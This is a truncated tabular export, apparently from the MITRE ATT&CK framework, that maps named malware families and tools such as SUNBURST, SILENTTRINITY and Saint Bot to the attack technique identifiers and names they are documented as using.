S0450 SHARPSTATmalware-- software uses T1124 System Timattack-pat technique [SHARPSTAT
S0028 SHIPSHAPEmalware-- software uses T1547.001Registry Ruattack-pat technique [SHIPSHAPE]
S0028 SHIPSHAPEmalware-- software uses T1091 Replicatio attack-pat technique [APT30](ht
S0028 SHIPSHAPEmalware-- software uses T1547.009Shortcut Mattack-pat technique [SHIPSHAPE]
S0063 SHOTPUT malware-- software uses T1083 File and Di attack-pat technique [SHOTPUT](h
S0063 SHOTPUT malware-- software uses T1087.001Local Acco attack-pat technique [SHOTPUT](
S0063 SHOTPUT malware-- software uses T1027 Obfuscatedattack-pat technique [SHOTPUT](h
S0063 SHOTPUT malware-- software uses T1057 Process Di attack-pat technique [SHOTPUT](h
S0063 SHOTPUT malware-- software uses T1018 Remote Sysattack-pat technique [SHOTPUT](h
S0063 SHOTPUT malware-- software uses T1049 System Netattack-pat technique [SHOTPUT](h
S0217 SHUTTERS malware-- software uses T1105 Ingress Tooattack-pat technique [SHUTTERSP
S0217 SHUTTERS malware-- software uses T1113 Screen Capattack-pat technique [SHUTTERSP
S0217 SHUTTERS malware-- software uses T1082 System Inf attack-pat technique [SHUTTERSP
S0692 SILENTTRINtool--1244 software uses T1010 Applicatio attack-pat technique [SILENTTRI
S0692 SILENTTRINtool--1244 software uses T1548.002Bypass Useattack-pat technique [SILENTTRI
S0692 SILENTTRINtool--1244 software uses T1546.001Change Defa attack-pat technique [SILENTTRIN
S0692 SILENTTRINtool--1244 software uses T1115 Clipboard attack-pat technique [SILENTTRIN
S0692 SILENTTRINtool--1244 software uses T1559.001Componentattack-pat technique [SILENTTRIN
S0692 SILENTTRINtool--1244 software uses T1546.015Componentattack-pat technique [SILENTTRIN
S0692 SILENTTRINtool--1244 software uses T1555.003Credential attack-pat technique [SILENTTRIN
S0692 SILENTTRINtool--1244 software uses T1562.001Disable or attack-pat technique [SILENTTRI
S0692 SILENTTRINtool--1244 software uses T1021.003Distribute attack-pat technique [SILENTTRI
S0692 SILENTTRINtool--1244 software uses T1087.002Domain Acattack-pat technique [SILENTTRI
S0692 SILENTTRINtool--1244 software uses T1069.002Domain Grattack-pat technique [SILENTTRI
S0692 SILENTTRINtool--1244 software uses T1562.010Downgradeattack-pat technique [SILENTTRI
S0692 SILENTTRINtool--1244 software uses T1041 Exfiltratio attack-pat technique [SILENTTRIN
S0692 SILENTTRINtool--1244 software uses T1070.004File Deleti attack-pat technique [SILENTTRI
S0692 SILENTTRINtool--1244 software uses T1083 File and Di attack-pat technique [SILENTTRIN
S0692 SILENTTRINtool--1244 software uses T1056.002GUI Input attack-pat technique [SILENTTRIN
S0692 SILENTTRINtool--1244 software uses T1552.006Group Poliattack-pat technique [SILENTTRI
S0692 SILENTTRINtool--1244 software uses T1564.003Hidden Wi attack-pat technique [SILENTTRIN
S0692 SILENTTRINtool--1244 software uses T1562.003Impair Comattack-pat technique [SILENTTRI
S0692 SILENTTRINtool--1244 software uses T1070 Indicator attack-pat technique [SILENTTRIN
S0692 SILENTTRINtool--1244 software uses T1105 Ingress Tooattack-pat technique [SILENTTRIN
S0692 SILENTTRINtool--1244 software uses T1558.003Kerberoastattack-pat technique [SILENTTRI
S0692 SILENTTRINtool--1244 software uses T1056.001Keyloggingattack-pat technique [SILENTTRIN
S0692 SILENTTRINtool--1244 software uses T1003.001LSASS Memattack-pat technique [SILENTTRI
S0692 SILENTTRINtool--1244 software uses T1069.001Local Grouattack-pat technique [SILENTTRIN
S0692 SILENTTRINtool--1244 software uses T1134.003Make and attack-pat technique [SILENTTRI
S0692 SILENTTRINtool--1244 software uses T1556 Modify Autattack-pat technique [SILENTTRIN
S0692 SILENTTRINtool--1244 software uses T1112 Modify Regattack-pat technique [SILENTTRIN
S0692 SILENTTRINtool--1244 software uses T1106 Native API attack-pat technique [SILENTTRIN
S0692 SILENTTRINtool--1244 software uses T1046 Network Seattack-pat technique [SILENTTRI
S0692 SILENTTRINtool--1244 software uses T1135 Network Shattack-pat technique [SILENTTRI
S0692 SILENTTRINtool--1244 software uses T1059.001PowerShellattack-pat technique [SILENTTRI
S0692 SILENTTRINtool--1244 software uses T1057 Process Di attack-pat technique [SILENTTRI
S0692 SILENTTRINtool--1244 software uses T1055 Process Injattack-pat technique [SILENTTRIN
S0692 SILENTTRINtool--1244 software uses T1059.006Python attack-pat technique [SILENTTRIN
S0692 SILENTTRINtool--1244 software uses T1012 Query Regiattack-pat technique [SILENTTRI
S0692 SILENTTRINtool--1244 software uses T1620 Reflective attack-pat technique [SILENTTRIN
S0692 SILENTTRINtool--1244 software uses T1547.001Registry Ruattack-pat technique [SILENTTRIN
S0692 SILENTTRINtool--1244 software uses T1018 Remote Sysattack-pat technique [SILENTTRI
S0692 SILENTTRINtool--1244 software uses T1113 Screen Capattack-pat technique [SILENTTRIN
S0692 SILENTTRINtool--1244 software uses T1518.001Security S attack-pat technique [SILENTTRIN
S0692 SILENTTRINtool--1244 software uses T1082 System Inf attack-pat technique [SILENTTRIN
S0692 SILENTTRINtool--1244 software uses T1033 System Own attack-pat technique [SILENTTRIN
S0692 SILENTTRINtool--1244 software uses T1007 System Serattack-pat technique [SILENTTRIN
S0692 SILENTTRINtool--1244 software uses T1124 System Timattack-pat technique [SILENTTRI
S0692 SILENTTRINtool--1244 software uses T1134.001Token Impeattack-pat technique [SILENTTRIN
S0692 SILENTTRINtool--1244 software uses T1059.003Windows Cattack-pat technique [SILENTTRI
S0692 SILENTTRINtool--1244 software uses T1555.004Windows Cattack-pat technique [SILENTTRI
S0692 SILENTTRINtool--1244 software uses T1047 Windows M attack-pat technique [SILENTTRI
S0692 SILENTTRINtool--1244 software uses T1546.003Windows Ma attack-pat technique [SILENTTRIN
S0692 SILENTTRINtool--1244 software uses T1021.006Windows Rattack-pat technique [SILENTTRIN
S0692 SILENTTRINtool--1244 software uses T1543.003Windows Se attack-pat technique [SILENTTRIN
S1110 SLIGHTPULmalware-- software uses T1059 Command attack-pat
an technique [SLIGHTPULS
S1110 SLIGHTPULmalware-- software uses T1005 Data from attack-pat technique [SLIGHTPULS
S1110 SLIGHTPULmalware-- software uses T1140 Deobfuscatattack-pat technique [SLIGHTPUL
S1110 SLIGHTPULmalware-- software uses T1105 Ingress Tooattack-pat technique [RAPIDPULS
S1110 SLIGHTPULmalware-- software uses T1074.001Local Data attack-pat technique [SLIGHTPUL
S1110 SLIGHTPULmalware-- software uses T1132.001Standard Eattack-pat technique [SLIGHTPUL
S1110 SLIGHTPULmalware-- software uses T1573.001Symmetric attack-pat technique [SLIGHTPUL
S1110 SLIGHTPULmalware-- software uses T1071.001Web Protocattack-pat technique [SLIGHTPULS
S1110 SLIGHTPULmalware-- software uses T1505.003Web Shell attack-pat technique [SLIGHTPULS
S0533 SLOTHFUL malware--fsoftware uses T1001 Data Obfusattack-pat technique [SLOTHFULM
S0533 SLOTHFUL malware--fsoftware uses T1005 Data from attack-pat technique [SLOTHFULM
S0533 SLOTHFUL malware--fsoftware uses T1041 Exfiltratio attack-pat technique [SLOTHFULM
S0533 SLOTHFUL malware--fsoftware uses T1070.004File Deleti attack-pat technique [SLOTHFULM
S0533 SLOTHFUL malware--fsoftware uses T1083 File and Di attack-pat technique [SLOTHFULM
S0533 SLOTHFUL malware--fsoftware uses T1564.001Hidden Fileattack-pat technique [SLOTHFULM
S0533 SLOTHFUL malware--fsoftware uses T1105 Ingress Tooattack-pat technique [SLOTHFULM
S0533 SLOTHFUL malware--fsoftware uses T1056.001Keyloggingattack-pat technique [SLOTHFULM
S0533 SLOTHFUL malware--fsoftware uses T1036.004Masquerade attack-pat technique [SLOTHFULM
S0533 SLOTHFUL malware--fsoftware uses T1036.005Match Legiattack-pat technique [SLOTHFULM
S0533 SLOTHFUL malware--fsoftware uses T1112 Modify Regattack-pat technique [SLOTHFULM
S0533 SLOTHFUL malware--fsoftware uses T1057 Process Di attack-pat technique [SLOTHFULM
S0533 SLOTHFUL malware--fsoftware uses T1055 Process Injattack-pat technique [SLOTHFULM
S0533 SLOTHFUL malware--fsoftware uses T1113 Screen Capattack-pat technique [SLOTHFULME
S0533 SLOTHFUL malware--fsoftware uses T1569.002Service Ex attack-pat technique [SLOTHFULM
S0533 SLOTHFUL malware--fsoftware uses T1489 Service Stoattack-pat technique [SLOTHFULM
S0533 SLOTHFUL malware--fsoftware uses T1082 System Inf attack-pat technique [SLOTHFULM
S0533 SLOTHFUL malware--fsoftware uses T1049 System Netattack-pat technique [SLOTHFULM
S0533 SLOTHFUL malware--fsoftware uses T1033 System Own attack-pat technique [SLOTHFULM
S0533 SLOTHFUL malware--fsoftware uses T1007 System Serattack-pat technique [SLOTHFULM
S0533 SLOTHFUL malware--fsoftware uses T1071.001Web Protocattack-pat technique [SLOTHFULM
S0533 SLOTHFUL malware--fsoftware uses T1059.003Windows Cattack-pat technique [SLOTHFULM
S0533 SLOTHFUL malware--fsoftware uses T1543.003Windows Se attack-pat technique [SLOTHFULM
S0218 SLOWDRIFmalware-- software uses T1102.002Bidirectio attack-pat technique [SLOWDRIFT]
S0218 SLOWDRIFmalware-- software uses T1105 Ingress Tooattack-pat technique [SLOWDRIFT
S0218 SLOWDRIFmalware-- software uses T1082 System Inf attack-pat technique [SLOWDRIFT]
S1104 SLOWPULSmalware--fsoftware uses T1554 Compromise attack-pat technique [SLOWPULSE
S1104 SLOWPULSmalware--fsoftware uses T1074.001Local Data attack-pat technique [SLOWPULSE
S1104 SLOWPULSmalware--fsoftware uses T1556.006Multi-Fact attack-pat technique [SLOWPULSE]
S1104 SLOWPULSmalware--fsoftware uses T1111 Multi-Factoattack-pat technique [SLOWPULSE
S1104 SLOWPULSmalware--fsoftware uses T1556.004Network Deattack-pat technique [SLOWPULSE
S1104 SLOWPULSmalware--fsoftware uses T1027 Obfuscatedattack-pat technique [SLOWPULSE]
S0649 SMOKEDH malware-- software uses T1098.007Additional attack-pat technique [SMOKEDHAM
S0649 SMOKEDH malware-- software uses T1090.004Domain Froattack-pat technique [SMOKEDHAM
S0649 SMOKEDH malware-- software uses T1027.009Embeddedattack-pat technique The [SMOKE
S0649 SMOKEDH malware-- software uses T1041 Exfiltratio attack-pat technique [SMOKEDHAM
S0649 SMOKEDH malware-- software uses T1564.002Hidden Useattack-pat technique [SMOKEDHAM
S0649 SMOKEDH malware-- software uses T1105 Ingress Tooattack-pat technique [SMOKEDHAM
S0649 SMOKEDH malware-- software uses T1056.001Keyloggingattack-pat technique [SMOKEDHAM
S0649 SMOKEDH malware-- software uses T1087.001Local Acco attack-pat technique [SMOKEDHAM
S0649 SMOKEDH malware-- software uses T1136.001Local Acco attack-pat technique [SMOKEDHAM
S0649 SMOKEDH malware-- software uses T1204.001Malicious Lattack-pat technique [SMOKEDHAM]
S0649 SMOKEDH malware-- software uses T1112 Modify Regattack-pat technique [SMOKEDHAM]
S0649 SMOKEDH malware-- software uses T1059.001PowerShellattack-pat technique [SMOKEDHAM
S0649 SMOKEDH malware-- software uses T1547.001Registry Ruattack-pat technique [SMOKEDHAM
S0649 SMOKEDH malware-- software uses T1113 Screen Capattack-pat technique [SMOKEDHAM
S0649 SMOKEDH malware-- software uses T1598.003Spearphishattack-pat technique [SMOKEDHAM]
S0649 SMOKEDH malware-- software uses T1132.001Standard Eattack-pat technique [SMOKEDHAM
S0649 SMOKEDH malware-- software uses T1573.001Symmetric attack-pat technique [SMOKEDHAM
S0649 SMOKEDH malware-- software uses T1082 System Inf attack-pat technique [SMOKEDHAM
S0649 SMOKEDH malware-- software uses T1033 System Own attack-pat technique [SMOKEDHAM
S0649 SMOKEDH malware-- software uses T1071.001Web Protocattack-pat technique [SMOKEDHAM
S0649 SMOKEDH malware-- software uses T1102 Web Servicattack-pat technique [SMOKEDHAM
S0159 SNUGRIDEmalware-- software uses T1547.001Registry Ruattack-pat technique [SNUGRIDE](
S0159 SNUGRIDEmalware-- software uses T1573.001Symmetric attack-pat technique [SNUGRIDE](
S0159 SNUGRIDEmalware-- software uses T1071.001Web Protocattack-pat technique [SNUGRIDE]
S0159 SNUGRIDEmalware-- software uses T1059.003Windows Cattack-pat technique [SNUGRIDE](
S0157 SOUNDBITmalware-- software uses T1010 Applicatio attack-pat technique [SOUNDBITE
S0157 SOUNDBITmalware-- software uses T1071.004DNS attack-pat technique [SOUNDBITE
S0157 SOUNDBITmalware-- software uses T1083 File and Di attack-pat technique [SOUNDBITE]
S0157 SOUNDBITmalware-- software uses T1112 Modify Regattack-pat technique [SOUNDBITE]
S0157 SOUNDBITmalware-- software uses T1082 System Inf attack-pat technique [SOUNDBITE
S0035 SPACESHIPmalware-- software uses T1560.003Archive vi attack-pat technique Data [SPACE
S0035 SPACESHIPmalware-- software uses T1052.001Exfiltratio attack-pat technique [SPACESHIP]
S0035 SPACESHIPmalware-- software uses T1083 File and Di attack-pat technique [SPACESHIP]
S0035 SPACESHIPmalware-- software uses T1074.001Local Data attack-pat technique [SPACESHIP]
S0035 SPACESHIPmalware-- software uses T1547.001Registry Ruattack-pat technique [SPACESHIP]
S0035 SPACESHIPmalware-- software uses T1547.009Shortcut Mattack-pat technique [SPACESHIP]
S0390 SQLRat malware--8software uses T1027.010Command aOttack-pat technique [SQLRat](ht
S0390 SQLRat malware--8software uses T1140 Deobfuscatattack-pat technique [SQLRat](ht
S0390 SQLRat malware--8software uses T1070.004File Deleti attack-pat technique [SQLRat](ht
S0390 SQLRat malware--8software uses T1105 Ingress Tooattack-pat technique [SQLRat](ht
S0390 SQLRat malware--8software uses T1204.002Malicious Fattack-pat technique [SQLRat](ht
S0390 SQLRat malware--8software uses T1059.001PowerShellattack-pat technique [SQLRat](ht
S0390 SQLRat malware--8software uses T1053.005Scheduled attack-pat technique [SQLRat](h
S0390 SQLRat malware--8software uses T1059.003Windows Cattack-pat technique [SQLRat](ht
S1037 STARWHALmalware--esoftware uses T1005 Data from attack-pat technique [STARWHALE
S1037 STARWHALmalware--esoftware uses T1027.013Encrypted/attack-pat technique [STARWHALE
S1037 STARWHALmalware--esoftware uses T1041 Exfiltratio attack-pat technique [STARWHALE
S1037 STARWHALmalware--esoftware uses T1074.001Local Data attack-pat technique [STARWHALE]
S1037 STARWHALmalware--esoftware uses T1204.002Malicious Fattack-pat technique [STARWHALE
S1037 STARWHALmalware--esoftware uses T1547.001Registry Ruattack-pat technique [STARWHALE
S1037 STARWHALmalware--esoftware uses T1132.001Standard Eattack-pat technique [STARWHALE
S1037 STARWHALmalware--esoftware uses T1082 System Inf attack-pat technique [STARWHALE
S1037 STARWHALmalware--esoftware uses T1016 System Netattack-pat technique [STARWHALE
S1037 STARWHALmalware--esoftware uses T1033 System Own attack-pat technique [STARWHALE
S1037 STARWHALmalware--esoftware uses T1059.005Visual Basiattack-pat technique [STARWHALE
S1037 STARWHALmalware--esoftware uses T1071.001Web Protocattack-pat technique [STARWHALE
S1037 STARWHALmalware--esoftware uses T1059.003Windows Cattack-pat technique [STARWHALE
S1037 STARWHALmalware--esoftware uses T1543.003Windows Se attack-pat technique [STARWHALE
S1112 STEADYPULmalware--csoftware uses T1140 Deobfuscatattack-pat technique [STEADYPUL
S1112 STEADYPULmalware--csoftware uses T1105 Ingress Tooattack-pat technique [STEADYPULS
S1112 STEADYPULmalware--csoftware uses T1132.001Standard Eattack-pat technique [STEADYPUL
S1112 STEADYPULmalware--csoftware uses T1071.001Web Protocattack-pat technique [STEADYPUL
S1112 STEADYPULmalware--csoftware uses T1505.003Web Shell attack-pat technique [STEADYPUL
S1042 SUGARDU malware--9software uses T1560.003Archive vi attack-pat technique [SUGARDUMP
S1042 SUGARDU malware--9software uses T1217 Browser Inattack-pat technique [SUGARDUMP
S1042 SUGARDU malware--9software uses T1555.003Credential attack-pat technique [SUGARDUMP
S1042 SUGARDU malware--9software uses T1041 Exfiltratio attack-pat technique [SUGARDUMP
S1042 SUGARDU malware--9software uses T1083 File and Di attack-pat technique [SUGARDUMP]
S1042 SUGARDU malware--9software uses T1074.001Local Data attack-pat technique [SUGARDUMP
S1042 SUGARDU malware--9software uses T1071.003Mail Protocattack-pat technique A [SUGARDU
S1042 SUGARDU malware--9software uses T1204.002Malicious Fattack-pat technique Some [SUGA
S1042 SUGARDU malware--9software uses T1036.004Masquerade attack-pat technique [SUGARDUMP
S1042 SUGARDU malware--9software uses T1036.005Match Legiattack-pat technique [SUGARDUMP
S1042 SUGARDU malware--9software uses T1053.005Scheduled attack-pat technique [SUGARDUMP
S1042 SUGARDU malware--9software uses T1518 Software Dattack-pat technique [SUGARDUMP
S1042 SUGARDU malware--9software uses T1071.001Web Protocattack-pat technique A [SUGARDU
S1049 SUGARUSHmalware-- software uses T1016.001Internet C attack-pat technique [SUGARUSH]
S1049 SUGARUSHmalware-- software uses T1095 Non-Applicattack-pat technique [SUGARUSH]
S1049 SUGARUSHmalware-- software uses T1571 Non-Standaattack-pat technique [SUGARUSH]
S1049 SUGARUSHmalware-- software uses T1059.003Windows Cattack-pat technique [SUGARUSH]
S1049 SUGARUSHmalware-- software uses T1543.003Windows Se attack-pat technique [SUGARUSH]
S0559 SUNBURSTmalware--asoftware uses T1070.007Clear Netwattack-pat technique [SUNBURST](
S0559 SUNBURSTmalware--asoftware uses T1070.009Clear Persiattack-pat technique [SUNBURST](
S0559 SUNBURSTmalware--asoftware uses T1553.002Code Signi attack-pat technique [SUNBURST]
S0559 SUNBURSTmalware--asoftware uses T1071.004DNS attack-pat technique [SUNBURST]
S0559 SUNBURSTmalware--asoftware uses T1005 Data from attack-pat technique [SUNBURST]
S0559 SUNBURSTmalware--asoftware uses T1562.001Disable or attack-pat technique [SUNBURST](
S0559 SUNBURSTmalware--asoftware uses T1568 Dynamic Reattack-pat technique [SUNBURST]
S0559 SUNBURSTmalware--asoftware uses T1070.004File Deleti attack-pat technique [SUNBURST]
S0559 SUNBURSTmalware--asoftware uses T1083 File and Di attack-pat technique [SUNBURST]
S0559 SUNBURSTmalware--asoftware uses T1546.012Image File attack-pat technique [SUNBURST](
S0559 SUNBURSTmalware--asoftware uses T1070 Indicator attack-pat technique [SUNBURST](
S0559 SUNBURSTmalware--asoftware uses T1027.005Indicator attack-pat technique [SUNBURST]
S0559 SUNBURSTmalware--asoftware uses T1105 Ingress Tooattack-pat technique [SUNBURST]
S0559 SUNBURSTmalware--asoftware uses T1001.001Junk Data attack-pat technique [SUNBURST]
S0559 SUNBURSTmalware--asoftware uses T1036.005Match Legiattack-pat technique [SUNBURST](
S0559 SUNBURSTmalware--asoftware uses T1112 Modify Regattack-pat technique [SUNBURST](
S0559 SUNBURSTmalware--asoftware uses T1027 Obfuscatedattack-pat technique [SUNBURST]
S0559 SUNBURSTmalware--asoftware uses T1057 Process Di attack-pat technique [SUNBURST]
S0559 SUNBURSTmalware--asoftware uses T1001.003Protocol o attack-pat technique [SUNBURST]
S0559 SUNBURSTmalware--asoftware uses T1012 Query Regiattack-pat technique [SUNBURST]
S0559 SUNBURSTmalware--asoftware uses T1218.011Rundll32 attack-pat technique [SUNBURST]
S0559 SUNBURSTmalware--asoftware uses T1518.001Security S attack-pat technique [SUNBURST](
S0559 SUNBURSTmalware--asoftware uses T1132.001Standard Eattack-pat technique [SUNBURST]
S0559 SUNBURSTmalware--asoftware uses T1001.002Steganogr attack-pat technique [SUNBURST]
S0559 SUNBURSTmalware--asoftware uses T1573.001Symmetric attack-pat technique [SUNBURST]
S0559 SUNBURSTmalware--asoftware uses T1497.001System Cheattack-pat technique [SUNBURST]
S0559 SUNBURSTmalware--asoftware uses T1082 System Inf attack-pat technique [SUNBURST]
S0559 SUNBURSTmalware--asoftware uses T1016 System Netattack-pat technique [SUNBURST]
S0559 SUNBURSTmalware--asoftware uses T1033 System Own attack-pat technique [SUNBURST]
S0559 SUNBURSTmalware--asoftware uses T1007 System Serattack-pat technique [SUNBURST]
S0559 SUNBURSTmalware--asoftware uses T1124 System Timattack-pat technique [SUNBURST]
S0559 SUNBURSTmalware--asoftware uses T1497.003Time Basedattack-pat technique [SUNBURST]
S0559 SUNBURSTmalware--asoftware uses T1059.005Visual Basiattack-pat technique [SUNBURST](
S0559 SUNBURSTmalware--asoftware uses T1071.001Web Protocattack-pat technique [SUNBURST]
S0559 SUNBURSTmalware--asoftware uses T1047 Windows M attack-pat technique [SUNBURST]
S0562 SUNSPOT malware--bsoftware uses T1134 Access Tokattack-pat technique [SUNSPOT](
S0562 SUNSPOT malware--bsoftware uses T1195.002Compromise attack-pat technique [SUNSPOT](
S0562 SUNSPOT malware--bsoftware uses T1140 Deobfuscatattack-pat technique [SUNSPOT](
S0562 SUNSPOT malware--bsoftware uses T1480 Execution attack-pat technique [SUNSPOT](
S0562 SUNSPOT malware--bsoftware uses T1070.004File Deleti attack-pat technique Following
S0562 SUNSPOT malware--bsoftware uses T1083 File and Di attack-pat technique [SUNSPOT](
S0562 SUNSPOT malware--bsoftware uses T1036.005Match Legiattack-pat technique [SUNSPOT](
S0562 SUNSPOT malware--bsoftware uses T1480.002Mutual Excattack-pat technique [SUNSPOT](
S0562 SUNSPOT malware--bsoftware uses T1106 Native API attack-pat technique [SUNSPOT](
S0562 SUNSPOT malware--bsoftware uses T1027 Obfuscatedattack-pat technique [SUNSPOT](
S0562 SUNSPOT malware--bsoftware uses T1057 Process Di attack-pat technique [SUNSPOT](
S0562 SUNSPOT malware--bsoftware uses T1565.001Stored Datattack-pat technique [SUNSPOT](
S0578 SUPERNOVmalware-- software uses T1027.013Encrypted/attack-pat technique [SUPERNOVA
S0578 SUPERNOVmalware-- software uses T1203 Exploitatioattack-pat technique [SUPERNOVA]
S0578 SUPERNOVmalware-- software uses T1036.005Match Legiattack-pat technique [SUPERNOVA
S0578 SUPERNOVmalware-- software uses T1071.001Web Protocattack-pat technique [SUPERNOVA
S0578 SUPERNOVmalware-- software uses T1505.003Web Shell attack-pat technique [SUPERNOVA
S1064 SVCReady malware--7software uses T1546.015Componentattack-pat technique [SVCReady]
S1064 SVCReady malware--7software uses T1005 Data from attack-pat technique [SVCReady](
S1064 SVCReady malware--7software uses T1041 Exfiltratio attack-pat technique [SVCReady](
S1064 SVCReady malware--7software uses T1105 Ingress Tooattack-pat technique [SVCReady](
S1064 SVCReady malware--7software uses T1204.002Malicious Fattack-pat technique [SVCReady](
S1064 SVCReady malware--7software uses T1036.004Masquerade attack-pat technique [SVCReady](
S1064 SVCReady malware--7software uses T1106 Native API attack-pat technique [SVCReady]
S1064 SVCReady malware--7software uses T1027 Obfuscatedattack-pat technique [SVCReady]
S1064 SVCReady malware--7software uses T1120 Peripheral attack-pat technique [SVCReady](
S1064 SVCReady malware--7software uses T1057 Process Di attack-pat technique [SVCReady](
S1064 SVCReady malware--7software uses T1012 Query Regiattack-pat technique [SVCReady]
S1064 SVCReady malware--7software uses T1218.011Rundll32 attack-pat technique [SVCReady](
S1064 SVCReady malware--7software uses T1053.005Scheduled attack-pat technique [SVCReady]
S1064 SVCReady malware--7software uses T1113 Screen Capattack-pat technique [SVCReady]
S1064 SVCReady malware--7software uses T1518 Software Dattack-pat technique [SVCReady](
S1064 SVCReady malware--7software uses T1566.001Spearphishattack-pat technique [SVCReady]
S1064 SVCReady malware--7software uses T1497.001System Cheattack-pat technique [SVCReady](
S1064 SVCReady malware--7software uses T1082 System Inf attack-pat technique [SVCReady](
S1064 SVCReady malware--7software uses T1033 System Own attack-pat technique [SVCReady]
S1064 SVCReady malware--7software uses T1124 System Timattack-pat technique [SVCReady]
S1064 SVCReady malware--7software uses T1497.003Time Basedattack-pat technique [SVCReady](
S1064 SVCReady malware--7software uses T1059.005Visual Basiattack-pat technique [SVCReady]
S1064 SVCReady malware--7software uses T1071.001Web Protocattack-pat technique [SVCReady]
S1064 SVCReady malware--7software uses T1047 Windows M attack-pat technique [SVCReady]
S0519 SYNful Knomalware-- software uses T1556.004Network Deattack-pat technique [SYNful Kno
S0519 SYNful Knomalware-- software uses T1601.001Patch Syst attack-pat technique [SYNful Kno
S0519 SYNful Knomalware-- software uses T1205 Traffic Signattack-pat technique [SYNful Kno
S0464 SYSCON malware-- software uses T1071.002File Transf attack-pat technique [SYSCON](h
S0464 SYSCON malware-- software uses T1204.002Malicious Fattack-pat technique [SYSCON](h
S0464 SYSCON malware-- software uses T1057 Process Di attack-pat technique [SYSCON](ht
S0464 SYSCON malware-- software uses T1082 System Inf attack-pat technique [SYSCON](ht
S0464 SYSCON malware-- software uses T1059.003Windows Cattack-pat technique [SYSCON](h
S1018 Saint Bot malware-- software uses T1055.004Asynchronoattack-pat technique [Saint Bot
S1018 Saint Bot malware-- software uses T1548.002Bypass Useattack-pat technique [Saint Bot]
S1018 Saint Bot malware-- software uses T1005 Data from attack-pat technique [Saint Bot]
S1018 Saint Bot malware-- software uses T1622 Debugger Eattack-pat technique [Saint Bot]
S1018 Saint Bot malware-- software uses T1140 Deobfuscatattack-pat technique [Saint Bot]
S1018 Saint Bot malware-- software uses T1055.001Dynamic-linattack-pat technique [Saint Bot]
S1018 Saint Bot malware-- software uses T1070.004File Deleti attack-pat technique [Saint Bot]
S1018 Saint Bot malware-- software uses T1083 File and Di attack-pat technique [Saint Bot]
S1018 Saint Bot malware-- software uses T1574 Hijack Exe attack-pat technique [Saint Bot]
S1018 Saint Bot malware-- software uses T1105 Ingress Tooattack-pat technique [Saint Bot]
S1018 Saint Bot malware-- software uses T1218.004InstallUtil attack-pat technique [Saint Bot]
S1018 Saint Bot malware-- software uses T1204.002Malicious Fattack-pat technique [Saint Bot]
S1018 Saint Bot malware-- software uses T1204.001Malicious Lattack-pat technique [Saint Bot]
S1018 Saint Bot malware-- software uses T1036 Masqueradattack-pat technique [Saint Bot]
S1018 Saint Bot malware-- software uses T1036.005Match Legiattack-pat technique [Saint Bot]
S1018 Saint Bot malware-- software uses T1106 Native API attack-pat technique [Saint Bot]
S1018 Saint Bot malware-- software uses T1027 Obfuscatedattack-pat technique [Saint Bot]
S1018 Saint Bot malware-- software uses T1059.001PowerShellattack-pat technique [Saint Bot]
S1018 Saint Bot malware-- software uses T1057 Process Di attack-pat technique [Saint Bot]
S1018 Saint Bot malware-- software uses T1055.012Process Hoattack-pat technique The [Saint
S1018 Saint Bot malware-- software uses T1012 Query Regiattack-pat technique [Saint Bot]
S1018 Saint Bot malware-- software uses T1547.001Registry Ruattack-pat technique [Saint Bot]
S1018 Saint Bot malware-- software uses T1218.010Regsvr32 attack-pat technique [Saint Bot]
S1018 Saint Bot malware-- software uses T1053.005Scheduled attack-pat technique [Saint Bot]
S1018 Saint Bot malware-- software uses T1027.002Software Pattack-pat technique [Saint Bot]
S1018 Saint Bot malware-- software uses T1566.001Spearphishattack-pat technique [Saint Bot]
S1018 Saint Bot malware-- software uses T1566.002Spearphishattack-pat technique [Saint Bot]
S1018 Saint Bot malware-- software uses T1132.001Standard Eattack-pat technique [Saint Bot]
S1018 Saint Bot malware-- software uses T1497.001System Cheattack-pat technique [Saint Bot]
S1018 Saint Bot malware-- software uses T1082 System Inf attack-pat technique [Saint Bot]
S1018 Saint Bot malware-- software uses T1614 System Locattack-pat technique [Saint Bot]
S1018 Saint Bot malware-- software uses T1016 System Netattack-pat technique [Saint Bot]
S1018 Saint Bot malware-- software uses T1033 System Own attack-pat technique [Saint Bot]
S1018 Saint Bot malware-- software uses T1497.003Time Basedattack-pat technique [Saint Bot]
S1018 Saint Bot malware-- software uses T1059.005Visual Basiattack-pat technique [Saint Bot]
S1018 Saint Bot malware-- software uses T1071.001Web Protocattack-pat technique [Saint Bot]
S1018 Saint Bot malware-- software uses T1059.003Windows Cattack-pat technique [Saint Bot]
S0074 Sakula malware-- software uses T1548.002Bypass Useattack-pat technique [Sakula](ht
S0074 Sakula malware-- software uses T1574.002DLL Side-L attack-pat technique [Sakula](ht
S0074 Sakula malware-- software uses T1027.013Encrypted/attack-pat technique [Sakula](ht
S0074 Sakula malware-- software uses T1070.004File Deleti attack-pat technique Some [Sakul
S0074 Sakula malware-- software uses T1105 Ingress Tooattack-pat technique [Sakula](ht
S0074 Sakula malware-- software uses T1547.001Registry Ruattack-pat technique Most [Saku
S0074 Sakula malware-- software uses T1218.011Rundll32 attack-pat technique [Sakula](ht
S0074 Sakula malware-- software uses T1573.001Symmetric attack-pat technique [Sakula](ht
S0074 Sakula malware-- software uses T1071.001Web Protocattack-pat technique [Sakula](ht
S0074 Sakula malware-- software uses T1059.003Windows Cattack-pat technique [Sakula](ht
S0074 Sakula malware-- software uses T1543.003Windows Se attack-pat technique Some [Sakul
S0370 SamSam malware-- software uses T1027.001Binary Padattack-pat technique [SamSam](h
S0370 SamSam malware-- software uses T1486 Data Encryattack-pat technique [SamSam](ht
S0370 SamSam malware-- software uses T1027.013Encrypted/attack-pat technique [SamSam](h
S0370 SamSam malware-- software uses T1070.004File Deleti attack-pat technique [SamSam](ht
S0370 SamSam malware-- software uses T1059.003Windows Cattack-pat technique [SamSam](h
S1099 Samurai malware--asoftware uses T1027.004Compile Aftattack-pat technique [Samurai](
S1099 Samurai malware--asoftware uses T1005 Data from attack-pat technique [Samurai](
S1099 Samurai malware--asoftware uses T1027.007Dynamic APattack-pat technique [Samurai](
S1099 Samurai malware--asoftware uses T1083 File and Di attack-pat technique [Samurai](h
S1099 Samurai malware--asoftware uses T1105 Ingress Tooattack-pat technique [Samurai](h
S1099 Samurai malware--asoftware uses T1036.005Match Legiattack-pat technique [Samurai](
S1099 Samurai malware--asoftware uses T1112 Modify Regattack-pat technique The [Samura
S1099 Samurai malware--asoftware uses T1106 Native API attack-pat technique [Samurai](h
S1099 Samurai malware--asoftware uses T1095 Non-Applicattack-pat technique [Samurai](h
S1099 Samurai malware--asoftware uses T1027 Obfuscatedattack-pat technique [Samurai](h
S1099 Samurai malware--asoftware uses T1090 Proxy attack-pat technique [Samurai](h
